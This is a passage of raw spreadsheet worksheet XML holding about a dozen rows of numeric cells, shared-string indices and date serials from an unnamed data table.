      <c r="AJ577">
        <v>159</v>
      </c>
      <c r="AK577" t="s">
        <v>405</v>
      </c>
      <c r="AL577" t="s">
        <v>406</v>
      </c>
      <c r="AM577" t="s">
        <v>4605</v>
      </c>
      <c r="AN577" t="s">
        <v>55</v>
      </c>
      <c r="AO577">
        <v>2009</v>
      </c>
      <c r="AP577" t="s">
        <v>4606</v>
      </c>
      <c r="AQ577" t="s">
        <v>4607</v>
      </c>
      <c r="AR577" t="s">
        <v>4604</v>
      </c>
      <c r="AS577" t="s">
        <v>553</v>
      </c>
      <c r="AT577" t="s">
        <v>58</v>
      </c>
      <c r="AU577">
        <v>0</v>
      </c>
      <c r="AV577">
        <v>0</v>
      </c>
      <c r="AW577">
        <v>0</v>
      </c>
      <c r="AX577">
        <v>0</v>
      </c>
      <c r="AY577">
        <v>10</v>
      </c>
      <c r="AZ577">
        <v>6</v>
      </c>
      <c r="BA577" t="s">
        <v>16944</v>
      </c>
      <c r="BB577" t="s">
        <v>15389</v>
      </c>
      <c r="BC577" t="s">
        <v>10029</v>
      </c>
      <c r="BD577">
        <v>0</v>
      </c>
    </row>
    <row r="578" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A578">
        <v>1448</v>
      </c>
      <c r="B578" t="s">
        <v>4608</v>
      </c>
      <c r="C578" t="s">
        <v>458</v>
      </c>
      <c r="D578" t="s">
        <v>4609</v>
      </c>
      <c r="E578" t="s">
        <v>843</v>
      </c>
      <c r="F578" t="s">
        <v>1368</v>
      </c>
      <c r="G578" s="1">
        <v>44337</v>
      </c>
      <c r="H578">
        <v>10380</v>
      </c>
      <c r="I578">
        <v>10380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t="s">
        <v>4608</v>
      </c>
      <c r="AG578">
        <v>29151</v>
      </c>
      <c r="AH578">
        <v>5</v>
      </c>
      <c r="AJ578">
        <v>149</v>
      </c>
      <c r="AK578" t="s">
        <v>1355</v>
      </c>
      <c r="AL578" t="s">
        <v>1356</v>
      </c>
      <c r="AM578" t="s">
        <v>4610</v>
      </c>
      <c r="AN578" t="s">
        <v>68</v>
      </c>
      <c r="AO578">
        <v>2010</v>
      </c>
      <c r="AP578">
        <v>81261265648</v>
      </c>
      <c r="AQ578" t="s">
        <v>4611</v>
      </c>
      <c r="AR578" t="s">
        <v>4608</v>
      </c>
      <c r="AS578" t="s">
        <v>71</v>
      </c>
      <c r="AT578" t="s">
        <v>72</v>
      </c>
      <c r="AU578">
        <v>2</v>
      </c>
      <c r="AV578">
        <v>0</v>
      </c>
      <c r="AW578">
        <v>1</v>
      </c>
      <c r="AX578">
        <v>0</v>
      </c>
      <c r="AY578">
        <v>1</v>
      </c>
      <c r="AZ578">
        <v>1</v>
      </c>
      <c r="BA578" t="s">
        <v>16897</v>
      </c>
      <c r="BB578" t="s">
        <v>15284</v>
      </c>
      <c r="BC578" t="s">
        <v>10518</v>
      </c>
      <c r="BD578" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="579" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A579">
        <v>1229</v>
      </c>
      <c r="B579" t="s">
        <v>4612</v>
      </c>
      <c r="C579" t="s">
        <v>47</v>
      </c>
      <c r="D579" t="s">
        <v>4613</v>
      </c>
      <c r="E579" t="s">
        <v>142</v>
      </c>
      <c r="F579" t="s">
        <v>4614</v>
      </c>
      <c r="G579" s="1">
        <v>44316</v>
      </c>
      <c r="H579">
        <v>10395</v>
      </c>
      <c r="I579">
        <v>10395</v>
      </c>
      <c r="J579">
        <v>1</v>
      </c>
      <c r="K579">
        <v>0</v>
      </c>
      <c r="L579">
        <v>1</v>
      </c>
      <c r="M579">
        <v>2</v>
      </c>
      <c r="N579">
        <v>0</v>
      </c>
      <c r="O579">
        <v>0</v>
      </c>
      <c r="P579">
        <v>0</v>
      </c>
      <c r="Q579">
        <v>3</v>
      </c>
      <c r="R579">
        <v>0</v>
      </c>
      <c r="S579">
        <v>0</v>
      </c>
      <c r="T579">
        <v>0</v>
      </c>
      <c r="U579">
        <v>300000</v>
      </c>
      <c r="V579">
        <v>0</v>
      </c>
      <c r="W579">
        <v>5000</v>
      </c>
      <c r="X579">
        <v>2</v>
      </c>
      <c r="Y579">
        <v>0</v>
      </c>
      <c r="Z579">
        <v>0</v>
      </c>
      <c r="AA579">
        <v>0</v>
      </c>
      <c r="AB579">
        <v>150</v>
      </c>
      <c r="AC579">
        <v>0</v>
      </c>
      <c r="AD579">
        <v>0</v>
      </c>
      <c r="AE579">
        <v>3000</v>
      </c>
      <c r="AF579" t="s">
        <v>4615</v>
      </c>
      <c r="AG579">
        <v>20411</v>
      </c>
      <c r="AH579">
        <v>2</v>
      </c>
      <c r="AJ579">
        <v>53</v>
      </c>
      <c r="AK579" t="s">
        <v>4616</v>
      </c>
      <c r="AL579" t="s">
        <v>2221</v>
      </c>
      <c r="AM579" t="s">
        <v>4617</v>
      </c>
      <c r="AN579" t="s">
        <v>55</v>
      </c>
      <c r="AO579">
        <v>2017</v>
      </c>
      <c r="AP579">
        <v>81212396457</v>
      </c>
      <c r="AQ579" t="s">
        <v>4618</v>
      </c>
      <c r="AR579" t="s">
        <v>4615</v>
      </c>
      <c r="AS579" t="s">
        <v>71</v>
      </c>
      <c r="AT579" t="s">
        <v>58</v>
      </c>
      <c r="AU579">
        <v>30</v>
      </c>
      <c r="AV579">
        <v>8</v>
      </c>
      <c r="AW579">
        <v>0</v>
      </c>
      <c r="AX579">
        <v>0</v>
      </c>
      <c r="AY579">
        <v>15</v>
      </c>
      <c r="AZ579">
        <v>31</v>
      </c>
      <c r="BA579" t="s">
        <v>16823</v>
      </c>
      <c r="BB579" t="s">
        <v>15140</v>
      </c>
      <c r="BC579" t="s">
        <v>13812</v>
      </c>
      <c r="BD579" t="s">
        <v>10618</v>
      </c>
    </row>
    <row r="580" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A580">
        <v>1531</v>
      </c>
      <c r="B580" t="s">
        <v>4619</v>
      </c>
      <c r="C580" t="s">
        <v>99</v>
      </c>
      <c r="D580" t="s">
        <v>4620</v>
      </c>
      <c r="E580" t="s">
        <v>142</v>
      </c>
      <c r="F580" t="s">
        <v>4621</v>
      </c>
      <c r="G580" s="1">
        <v>44301</v>
      </c>
      <c r="H580">
        <v>10397</v>
      </c>
      <c r="I580">
        <v>10397</v>
      </c>
      <c r="J580">
        <v>1</v>
      </c>
      <c r="K580">
        <v>0</v>
      </c>
      <c r="L580">
        <v>1</v>
      </c>
      <c r="M580">
        <v>0</v>
      </c>
      <c r="N580">
        <v>0</v>
      </c>
      <c r="O580">
        <v>0</v>
      </c>
      <c r="P580">
        <v>0</v>
      </c>
      <c r="Q580">
        <v>0</v>
      </c>
      <c r="R580">
        <v>0</v>
      </c>
      <c r="S580">
        <v>0</v>
      </c>
      <c r="T580">
        <v>0</v>
      </c>
      <c r="U580">
        <v>2000000</v>
      </c>
      <c r="V580">
        <v>0</v>
      </c>
      <c r="W580">
        <v>1000</v>
      </c>
      <c r="X580">
        <v>0</v>
      </c>
      <c r="Y580">
        <v>0</v>
      </c>
      <c r="Z580">
        <v>0</v>
      </c>
      <c r="AA580">
        <v>0</v>
      </c>
      <c r="AB580">
        <v>0</v>
      </c>
      <c r="AC580">
        <v>0</v>
      </c>
      <c r="AD580">
        <v>0</v>
      </c>
      <c r="AE580">
        <v>0</v>
      </c>
      <c r="AF580" t="s">
        <v>4622</v>
      </c>
      <c r="AG580">
        <v>14440</v>
      </c>
      <c r="AH580">
        <v>12</v>
      </c>
      <c r="AJ580">
        <v>160</v>
      </c>
      <c r="AK580" t="s">
        <v>114</v>
      </c>
      <c r="AL580" t="s">
        <v>115</v>
      </c>
      <c r="AM580" t="s">
        <v>4623</v>
      </c>
      <c r="AN580" t="s">
        <v>55</v>
      </c>
      <c r="AO580">
        <v>2018</v>
      </c>
      <c r="AP580" t="s">
        <v>4624</v>
      </c>
      <c r="AQ580" t="s">
        <v>4625</v>
      </c>
      <c r="AR580" t="s">
        <v>4626</v>
      </c>
      <c r="AS580" t="s">
        <v>71</v>
      </c>
      <c r="AT580" t="s">
        <v>58</v>
      </c>
      <c r="AU580">
        <v>6</v>
      </c>
      <c r="AV580">
        <v>1</v>
      </c>
      <c r="AW580">
        <v>15</v>
      </c>
      <c r="AX580">
        <v>0</v>
      </c>
      <c r="AY580">
        <v>32</v>
      </c>
      <c r="AZ580">
        <v>7</v>
      </c>
      <c r="BA580" t="s">
        <v>16928</v>
      </c>
      <c r="BB580" t="s">
        <v>15345</v>
      </c>
      <c r="BC580" t="s">
        <v>10546</v>
      </c>
      <c r="BD580" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="581" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A581">
        <v>1689</v>
      </c>
      <c r="B581" t="s">
        <v>4627</v>
      </c>
      <c r="C581" t="s">
        <v>458</v>
      </c>
      <c r="D581" t="s">
        <v>4628</v>
      </c>
      <c r="E581" t="s">
        <v>111</v>
      </c>
      <c r="F581" t="s">
        <v>4629</v>
      </c>
      <c r="G581" s="1">
        <v>44336</v>
      </c>
      <c r="H581">
        <v>10531</v>
      </c>
      <c r="I581">
        <v>10531</v>
      </c>
      <c r="J581">
        <v>0</v>
      </c>
      <c r="K581">
        <v>0</v>
      </c>
      <c r="L581">
        <v>1</v>
      </c>
      <c r="M581">
        <v>0</v>
      </c>
      <c r="N581">
        <v>0</v>
      </c>
      <c r="O581">
        <v>0</v>
      </c>
      <c r="P581">
        <v>0</v>
      </c>
      <c r="Q581">
        <v>0</v>
      </c>
      <c r="R581">
        <v>0</v>
      </c>
      <c r="S581">
        <v>1</v>
      </c>
      <c r="T581">
        <v>0</v>
      </c>
      <c r="U581">
        <v>0</v>
      </c>
      <c r="V581">
        <v>0</v>
      </c>
      <c r="W581">
        <v>10000</v>
      </c>
      <c r="X581">
        <v>0</v>
      </c>
      <c r="Y581">
        <v>0</v>
      </c>
      <c r="Z581">
        <v>0</v>
      </c>
      <c r="AA581">
        <v>0</v>
      </c>
      <c r="AB581">
        <v>0</v>
      </c>
      <c r="AC581">
        <v>0</v>
      </c>
      <c r="AD581">
        <v>1</v>
      </c>
      <c r="AE581">
        <v>0</v>
      </c>
      <c r="AF581" t="s">
        <v>4627</v>
      </c>
      <c r="AG581">
        <v>0</v>
      </c>
      <c r="AH581">
        <v>5</v>
      </c>
      <c r="AJ581">
        <v>149</v>
      </c>
      <c r="AK581" t="s">
        <v>1355</v>
      </c>
      <c r="AL581" t="s">
        <v>1356</v>
      </c>
      <c r="AM581" t="s">
        <v>4630</v>
      </c>
      <c r="AN581" t="s">
        <v>68</v>
      </c>
      <c r="AO581">
        <v>2016</v>
      </c>
      <c r="AP581">
        <v>81223528899</v>
      </c>
      <c r="AQ581" t="s">
        <v>4631</v>
      </c>
      <c r="AR581" t="s">
        <v>4627</v>
      </c>
      <c r="AS581" t="s">
        <v>71</v>
      </c>
      <c r="AT581" t="s">
        <v>72</v>
      </c>
      <c r="AU581">
        <v>0</v>
      </c>
      <c r="AV581">
        <v>0</v>
      </c>
      <c r="AW581">
        <v>0</v>
      </c>
      <c r="AX581">
        <v>0</v>
      </c>
      <c r="AY581">
        <v>7</v>
      </c>
      <c r="AZ581">
        <v>2</v>
      </c>
      <c r="BA581" t="s">
        <v>16706</v>
      </c>
      <c r="BB581" t="s">
        <v>15453</v>
      </c>
      <c r="BC581" t="s">
        <v>10518</v>
      </c>
      <c r="BD581" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="582" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A582">
        <v>1581</v>
      </c>
      <c r="B582" t="s">
        <v>4632</v>
      </c>
      <c r="C582" t="s">
        <v>47</v>
      </c>
      <c r="D582" t="s">
        <v>4633</v>
      </c>
      <c r="E582" t="s">
        <v>363</v>
      </c>
      <c r="F582" t="s">
        <v>764</v>
      </c>
      <c r="G582" s="1">
        <v>44343</v>
      </c>
      <c r="H582">
        <v>10538</v>
      </c>
      <c r="I582">
        <v>10538</v>
      </c>
      <c r="J582">
        <v>2</v>
      </c>
      <c r="K582">
        <v>0</v>
      </c>
      <c r="L582">
        <v>0</v>
      </c>
      <c r="M582">
        <v>0</v>
      </c>
      <c r="N582">
        <v>0</v>
      </c>
      <c r="O582">
        <v>0</v>
      </c>
      <c r="P582">
        <v>0</v>
      </c>
      <c r="Q582">
        <v>0</v>
      </c>
      <c r="R582">
        <v>0</v>
      </c>
      <c r="S582">
        <v>0</v>
      </c>
      <c r="T582">
        <v>0</v>
      </c>
      <c r="U582">
        <v>30</v>
      </c>
      <c r="V582">
        <v>0</v>
      </c>
      <c r="W582">
        <v>0</v>
      </c>
      <c r="X582">
        <v>0</v>
      </c>
      <c r="Y582">
        <v>0</v>
      </c>
      <c r="Z582">
        <v>0</v>
      </c>
      <c r="AA582">
        <v>0</v>
      </c>
      <c r="AB582">
        <v>0</v>
      </c>
      <c r="AC582">
        <v>0</v>
      </c>
      <c r="AD582">
        <v>0</v>
      </c>
      <c r="AE582">
        <v>0</v>
      </c>
      <c r="AF582" t="s">
        <v>4634</v>
      </c>
      <c r="AG582">
        <v>20146</v>
      </c>
      <c r="AH582">
        <v>2</v>
      </c>
      <c r="AJ582">
        <v>53</v>
      </c>
      <c r="AK582" t="s">
        <v>4635</v>
      </c>
      <c r="AL582" t="s">
        <v>4636</v>
      </c>
      <c r="AM582" t="s">
        <v>4637</v>
      </c>
      <c r="AN582" t="s">
        <v>55</v>
      </c>
      <c r="AO582">
        <v>2013</v>
      </c>
      <c r="AP582" t="s">
        <v>4638</v>
      </c>
      <c r="AQ582" t="s">
        <v>4639</v>
      </c>
      <c r="AR582" t="s">
        <v>4634</v>
      </c>
      <c r="AS582" t="s">
        <v>71</v>
      </c>
      <c r="AT582" t="s">
        <v>58</v>
      </c>
      <c r="AU582">
        <v>26</v>
      </c>
      <c r="AV582">
        <v>1</v>
      </c>
      <c r="AW582">
        <v>4</v>
      </c>
      <c r="AX582">
        <v>0</v>
      </c>
      <c r="AY582">
        <v>4</v>
      </c>
      <c r="AZ582">
        <v>1</v>
      </c>
      <c r="BA582" t="s">
        <v>16942</v>
      </c>
      <c r="BB582" t="s">
        <v>15381</v>
      </c>
      <c r="BC582" t="s">
        <v>13786</v>
      </c>
      <c r="BD582" t="s">
        <v>9954</v>
      </c>
    </row>
    <row r="583" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A583">
        <v>1446</v>
      </c>
      <c r="B583" t="s">
        <v>4640</v>
      </c>
      <c r="C583" t="s">
        <v>458</v>
      </c>
      <c r="D583" t="s">
        <v>4641</v>
      </c>
      <c r="E583" t="s">
        <v>843</v>
      </c>
      <c r="F583" t="s">
        <v>1368</v>
      </c>
      <c r="G583" s="1">
        <v>44340</v>
      </c>
      <c r="H583">
        <v>10720</v>
      </c>
      <c r="I583">
        <v>10720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t="s">
        <v>4640</v>
      </c>
      <c r="AG583">
        <v>29151</v>
      </c>
      <c r="AH583">
        <v>5</v>
      </c>
      <c r="AJ583">
        <v>149</v>
      </c>
      <c r="AK583" t="s">
        <v>1355</v>
      </c>
      <c r="AL583" t="s">
        <v>1356</v>
      </c>
      <c r="AM583" t="s">
        <v>4642</v>
      </c>
      <c r="AN583" t="s">
        <v>68</v>
      </c>
      <c r="AO583">
        <v>2010</v>
      </c>
      <c r="AP583">
        <v>8127769081</v>
      </c>
      <c r="AQ583" t="s">
        <v>4643</v>
      </c>
      <c r="AR583" t="s">
        <v>4640</v>
      </c>
      <c r="AS583" t="s">
        <v>71</v>
      </c>
      <c r="AT583" t="s">
        <v>72</v>
      </c>
      <c r="AU583">
        <v>5</v>
      </c>
      <c r="AV583">
        <v>1</v>
      </c>
      <c r="AW583">
        <v>0</v>
      </c>
      <c r="AX583">
        <v>0</v>
      </c>
      <c r="AY583">
        <v>2</v>
      </c>
      <c r="AZ583">
        <v>1</v>
      </c>
      <c r="BA583" t="s">
        <v>16895</v>
      </c>
      <c r="BB583" t="s">
        <v>15282</v>
      </c>
      <c r="BC583" t="s">
        <v>10222</v>
      </c>
      <c r="BD583" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="584" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A584">
        <v>1470</v>
      </c>
      <c r="B584" t="s">
        <v>4644</v>
      </c>
      <c r="C584" t="s">
        <v>47</v>
      </c>
      <c r="D584" t="s">
        <v>4645</v>
      </c>
      <c r="E584" t="s">
        <v>131</v>
      </c>
      <c r="F584" t="s">
        <v>132</v>
      </c>
      <c r="G584" s="1">
        <v>44379</v>
      </c>
      <c r="H584">
        <v>10758</v>
      </c>
      <c r="I584">
        <v>10758</v>
      </c>
      <c r="J584">
        <v>0</v>
      </c>
      <c r="K584">
        <v>0</v>
      </c>
      <c r="L584">
        <v>0</v>
      </c>
      <c r="M584">
        <v>0</v>
      </c>
      <c r="N584">
        <v>0</v>
      </c>
      <c r="O584">
        <v>0</v>
      </c>
      <c r="P584">
        <v>0</v>
      </c>
      <c r="Q584">
        <v>0</v>
      </c>
      <c r="R584">
        <v>0</v>
      </c>
      <c r="S584">
        <v>0</v>
      </c>
      <c r="T584">
        <v>1</v>
      </c>
      <c r="U584">
        <v>0</v>
      </c>
      <c r="V584">
        <v>0</v>
      </c>
      <c r="W584">
        <v>0</v>
      </c>
      <c r="X584">
        <v>0</v>
      </c>
      <c r="Y584">
        <v>0</v>
      </c>
      <c r="Z584">
        <v>0</v>
      </c>
      <c r="AA584">
        <v>0</v>
      </c>
      <c r="AB584">
        <v>0</v>
      </c>
      <c r="AC584">
        <v>0</v>
      </c>
      <c r="AD584">
        <v>0</v>
      </c>
      <c r="AE584">
        <v>0</v>
      </c>
      <c r="AF584" t="s">
        <v>4646</v>
      </c>
      <c r="AG584">
        <v>0</v>
      </c>
      <c r="AH584">
        <v>2</v>
      </c>
      <c r="AJ584">
        <v>35</v>
      </c>
      <c r="AK584" t="s">
        <v>4647</v>
      </c>
      <c r="AL584" t="s">
        <v>4648</v>
      </c>
      <c r="AM584" t="s">
        <v>4649</v>
      </c>
      <c r="AN584" t="s">
        <v>55</v>
      </c>
      <c r="AO584">
        <v>1987</v>
      </c>
      <c r="AP584" t="s">
        <v>4650</v>
      </c>
      <c r="AQ584" t="s">
        <v>4651</v>
      </c>
      <c r="AR584" t="s">
        <v>4646</v>
      </c>
      <c r="AS584" t="s">
        <v>71</v>
      </c>
      <c r="AT584" t="s">
        <v>58</v>
      </c>
      <c r="AU584">
        <v>0</v>
      </c>
      <c r="AV584">
        <v>0</v>
      </c>
      <c r="AW584">
        <v>2</v>
      </c>
      <c r="AX584">
        <v>4</v>
      </c>
      <c r="AY584">
        <v>2</v>
      </c>
      <c r="AZ584">
        <v>7</v>
      </c>
      <c r="BA584" t="s">
        <v>16908</v>
      </c>
      <c r="BB584" t="s">
        <v>15302</v>
      </c>
      <c r="BC584" t="s">
        <v>9603</v>
      </c>
      <c r="BD584" t="s">
        <v>13833</v>
      </c>
    </row>
    <row r="585" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A585">
        <v>1025</v>
      </c>
      <c r="B585" t="s">
        <v>4652</v>
      </c>
      <c r="C585" t="s">
        <v>4653</v>
      </c>
      <c r="D585" t="s">
        <v>4654</v>
      </c>
      <c r="E585" t="s">
        <v>528</v>
      </c>
      <c r="F585" t="s">
        <v>4655</v>
      </c>
      <c r="G585" s="1">
        <v>44327</v>
      </c>
      <c r="H585">
        <v>11014</v>
      </c>
      <c r="I585">
        <v>11014</v>
      </c>
      <c r="J585">
        <v>0</v>
      </c>
      <c r="K585">
        <v>0</v>
      </c>
      <c r="L585">
        <v>0</v>
      </c>
      <c r="M585">
        <v>0</v>
      </c>
      <c r="N585">
        <v>0</v>
      </c>
      <c r="O585">
        <v>0</v>
      </c>
      <c r="P585">
        <v>0</v>
      </c>
      <c r="Q585">
        <v>1</v>
      </c>
      <c r="R585">
        <v>0</v>
      </c>
      <c r="S585">
        <v>0</v>
      </c>
      <c r="T585">
        <v>1</v>
      </c>
      <c r="U585">
        <v>0</v>
      </c>
      <c r="V585">
        <v>0</v>
      </c>
      <c r="W585">
        <v>0</v>
      </c>
      <c r="X585">
        <v>0</v>
      </c>
      <c r="Y585">
        <v>0</v>
      </c>
      <c r="Z585">
        <v>0</v>
      </c>
      <c r="AA585">
        <v>0</v>
      </c>
      <c r="AB585">
        <v>500</v>
      </c>
      <c r="AC585">
        <v>0</v>
      </c>
      <c r="AD585">
        <v>0</v>
      </c>
      <c r="AE585">
        <v>1000</v>
      </c>
      <c r="AF585" t="s">
        <v>4656</v>
      </c>
      <c r="AG585">
        <v>36381</v>
      </c>
      <c r="AH585">
        <v>7</v>
      </c>
      <c r="AJ585">
        <v>92</v>
      </c>
      <c r="AK585" t="s">
        <v>4657</v>
      </c>
      <c r="AL585" t="s">
        <v>4658</v>
      </c>
      <c r="AM585" t="s">
        <v>4659</v>
      </c>
      <c r="AN585" t="s">
        <v>68</v>
      </c>
      <c r="AO585">
        <v>2015</v>
      </c>
      <c r="AP585">
        <v>85366010991</v>
      </c>
      <c r="AQ585" t="s">
        <v>4660</v>
      </c>
      <c r="AR585" t="s">
        <v>4656</v>
      </c>
      <c r="AS585" t="s">
        <v>71</v>
      </c>
      <c r="AT585" t="s">
        <v>72</v>
      </c>
      <c r="AU585">
        <v>20</v>
      </c>
      <c r="AV585">
        <v>0</v>
      </c>
      <c r="AW585">
        <v>0</v>
      </c>
      <c r="AX585">
        <v>0</v>
      </c>
      <c r="AY585">
        <v>2</v>
      </c>
      <c r="AZ585">
        <v>3</v>
      </c>
      <c r="BA585">
        <v>0</v>
      </c>
      <c r="BB585" t="s">
        <v>15007</v>
      </c>
      <c r="BC585" t="s">
        <v>9791</v>
      </c>
      <c r="BD585">
        <v>0</v>
      </c>
    </row>
    <row r="586" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A586">
        <v>1029</v>
      </c>
      <c r="B586" t="s">
        <v>4661</v>
      </c>
      <c r="C586" t="s">
        <v>157</v>
      </c>
      <c r="D586" t="s">
        <v>4662</v>
      </c>
      <c r="E586" t="s">
        <v>142</v>
      </c>
      <c r="F586" t="s">
        <v>4663</v>
      </c>
      <c r="G586" s="1">
        <v>44369</v>
      </c>
      <c r="H586">
        <v>11097</v>
      </c>
      <c r="I586">
        <v>11097</v>
      </c>
      <c r="J586">
        <v>2</v>
      </c>
      <c r="K586">
        <v>0</v>
      </c>
      <c r="L586">
        <v>0</v>
      </c>
      <c r="M586">
        <v>4</v>
      </c>
      <c r="N586">
        <v>6000</v>
      </c>
      <c r="O586">
        <v>0</v>
      </c>
      <c r="P586">
        <v>0</v>
      </c>
      <c r="Q586">
        <v>3</v>
      </c>
      <c r="R586">
        <v>0</v>
      </c>
      <c r="S586">
        <v>0</v>
      </c>
      <c r="T586">
        <v>1</v>
      </c>
      <c r="U586">
        <v>6000</v>
      </c>
      <c r="V586">
        <v>0</v>
      </c>
      <c r="W586">
        <v>0</v>
      </c>
      <c r="X586">
        <v>630</v>
      </c>
      <c r="Y586">
        <v>0</v>
      </c>
      <c r="Z586">
        <v>0</v>
      </c>
      <c r="AA586">
        <v>0</v>
      </c>
      <c r="AB586">
        <v>5000</v>
      </c>
      <c r="AC586">
        <v>0</v>
      </c>
      <c r="AD586">
        <v>0</v>
      </c>
      <c r="AE586">
        <v>0</v>
      </c>
      <c r="AF586" t="s">
        <v>4664</v>
      </c>
      <c r="AG586">
        <v>62291</v>
      </c>
      <c r="AH586">
        <v>16</v>
      </c>
      <c r="AJ586">
        <v>251</v>
      </c>
      <c r="AK586" t="s">
        <v>4665</v>
      </c>
      <c r="AL586" t="s">
        <v>4666</v>
      </c>
      <c r="AM586" t="s">
        <v>4667</v>
      </c>
      <c r="AN586" t="s">
        <v>82</v>
      </c>
      <c r="AO586">
        <v>2016</v>
      </c>
      <c r="AP586" t="s">
        <v>4668</v>
      </c>
      <c r="AQ586" t="s">
        <v>4669</v>
      </c>
      <c r="AR586" t="s">
        <v>4670</v>
      </c>
      <c r="AS586" t="s">
        <v>71</v>
      </c>
      <c r="AT586" t="s">
        <v>86</v>
      </c>
      <c r="AU586">
        <v>6</v>
      </c>
      <c r="AV586">
        <v>1</v>
      </c>
      <c r="AW586">
        <v>2966</v>
      </c>
      <c r="AX586">
        <v>6045</v>
      </c>
      <c r="AY586">
        <v>76</v>
      </c>
      <c r="AZ586">
        <v>69</v>
      </c>
      <c r="BA586" t="s">
        <v>16653</v>
      </c>
      <c r="BB586" t="s">
        <v>15011</v>
      </c>
      <c r="BC586">
        <v>0</v>
      </c>
      <c r="BD586" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="587" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A587">
        <v>1510</v>
      </c>
      <c r="B587" t="s">
        <v>4671</v>
      </c>
      <c r="C587" t="s">
        <v>47</v>
      </c>
      <c r="D587" t="s">
        <v>4672</v>
      </c>
      <c r="E587" t="s">
        <v>111</v>
      </c>
      <c r="F587" t="s">
        <v>4673</v>
      </c>
      <c r="G587" s="1">
        <v>44354</v>
      </c>
      <c r="H587">
        <v>11382</v>
      </c>
      <c r="I587">
        <v>11382</v>
      </c>
      <c r="J587">
        <v>1</v>
      </c>
      <c r="K587">
        <v>0</v>
      </c>
      <c r="L587">
        <v>1</v>
      </c>
      <c r="M587">
        <v>6</v>
      </c>
      <c r="N587">
        <v>0</v>
      </c>
      <c r="O587">
        <v>0</v>
      </c>
      <c r="P587">
        <v>0</v>
      </c>
      <c r="Q587">
        <v>0</v>
      </c>
      <c r="R587">
        <v>15</v>
      </c>
      <c r="S587">
        <v>0</v>
      </c>
      <c r="T587">
        <v>0</v>
      </c>
      <c r="U587">
        <v>1000000</v>
      </c>
      <c r="V587">
        <v>0</v>
      </c>
      <c r="W587">
        <v>2500</v>
      </c>
      <c r="X587">
        <v>18000</v>
      </c>
      <c r="Y587">
        <v>0</v>
      </c>
      <c r="Z587">
        <v>0</v>
      </c>
      <c r="AA587">
        <v>0</v>
      </c>
      <c r="AB587">
        <v>0</v>
      </c>
      <c r="AC587">
        <v>7500</v>
      </c>
      <c r="AD587">
        <v>0</v>
      </c>
      <c r="AE587">
        <v>0</v>
      </c>
      <c r="AF587" t="s">
        <v>4674</v>
      </c>
      <c r="AG587">
        <v>20413</v>
      </c>
      <c r="AH587">
        <v>2</v>
      </c>
      <c r="AJ587">
        <v>53</v>
      </c>
      <c r="AK587" t="s">
        <v>2220</v>
      </c>
      <c r="AL587" t="s">
        <v>2221</v>
      </c>
      <c r="AM587" t="s">
        <v>4675</v>
      </c>
      <c r="AN587" t="s">
        <v>55</v>
      </c>
      <c r="AO587">
        <v>2012</v>
      </c>
      <c r="AP587" t="s">
        <v>4676</v>
      </c>
      <c r="AQ587" t="s">
        <v>4677</v>
      </c>
      <c r="AR587" t="s">
        <v>4674</v>
      </c>
      <c r="AS587" t="s">
        <v>71</v>
      </c>
      <c r="AT587" t="s">
        <v>58</v>
      </c>
      <c r="AU587">
        <v>26</v>
      </c>
      <c r="AV587">
        <v>1</v>
      </c>
      <c r="AW587">
        <v>25</v>
      </c>
      <c r="AX587">
        <v>30</v>
      </c>
      <c r="AY587">
        <v>8</v>
      </c>
      <c r="AZ587">
        <v>3</v>
      </c>
      <c r="BA587" t="s">
        <v>16919</v>
      </c>
      <c r="BB587" t="s">
        <v>15329</v>
      </c>
      <c r="BC587" t="s">
        <v>13989</v>
      </c>
      <c r="BD587" t="s">
        <v>10871</v>
      </c>
    </row>
    <row r="588" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A588">
        <v>883</v>
      </c>
      <c r="B588" t="s">
        <v>4678</v>
      </c>
      <c r="C588" t="s">
        <v>47</v>
      </c>
      <c r="D588" t="s">
        <v>4679</v>
      </c>
      <c r="E588" t="s">
        <v>142</v>
      </c>
      <c r="F588" t="s">
        <v>2244</v>
      </c>
      <c r="G588" s="1">
        <v>44358</v>
      </c>
      <c r="H588">
        <v>11452</v>
      </c>
      <c r="I588">
        <v>11452</v>
      </c>
      <c r="J588">
        <v>2</v>
      </c>
      <c r="K588">
        <v>1</v>
      </c>
      <c r="L588">
        <v>2</v>
      </c>
      <c r="M588">
        <v>0</v>
      </c>
      <c r="N588">
        <v>0</v>
      </c>
      <c r="O588">
        <v>0</v>
      </c>
      <c r="P588">
        <v>0</v>
      </c>
      <c r="Q588">
        <v>0</v>
      </c>
      <c r="R588">
        <v>3</v>
      </c>
      <c r="S588">
        <v>0</v>
      </c>
      <c r="T588">
        <v>1</v>
      </c>
      <c r="U588">
        <v>600000</v>
      </c>
      <c r="V588">
        <v>25000</v>
      </c>
      <c r="W588">
        <v>25000</v>
      </c>
      <c r="X588">
        <v>0</v>
      </c>
      <c r="Y588">
        <v>0</v>
      </c>
      <c r="Z588">
        <v>0</v>
      </c>
      <c r="AA588">
        <v>0</v>
      </c>
      <c r="AB588">
        <v>0</v>
      </c>
      <c r="AC588">
        <v>25000</v>
      </c>
      <c r="AD588">
        <v>0</v>
      </c>
      <c r="AE588">
        <v>30000</v>
      </c>
      <c r="AF588" t="s">
        <v>4680</v>
      </c>
      <c r="AG588">
        <v>20371</v>
      </c>
      <c r="AH588">
        <v>2</v>
      </c>
      <c r="AJ588">
        <v>35</v>
      </c>
      <c r="AK588" t="s">
        <v>471</v>
      </c>
      <c r="AL588" t="s">
        <v>472</v>
      </c>
      <c r="AM588" t="s">
        <v>4681</v>
      </c>
      <c r="AN588" t="s">
        <v>55</v>
      </c>
      <c r="AO588">
        <v>2009</v>
      </c>
      <c r="AP588" t="s">
        <v>4682</v>
      </c>
      <c r="AQ588" t="s">
        <v>4683</v>
      </c>
      <c r="AR588" t="s">
        <v>4680</v>
      </c>
      <c r="AS588" t="s">
        <v>71</v>
      </c>
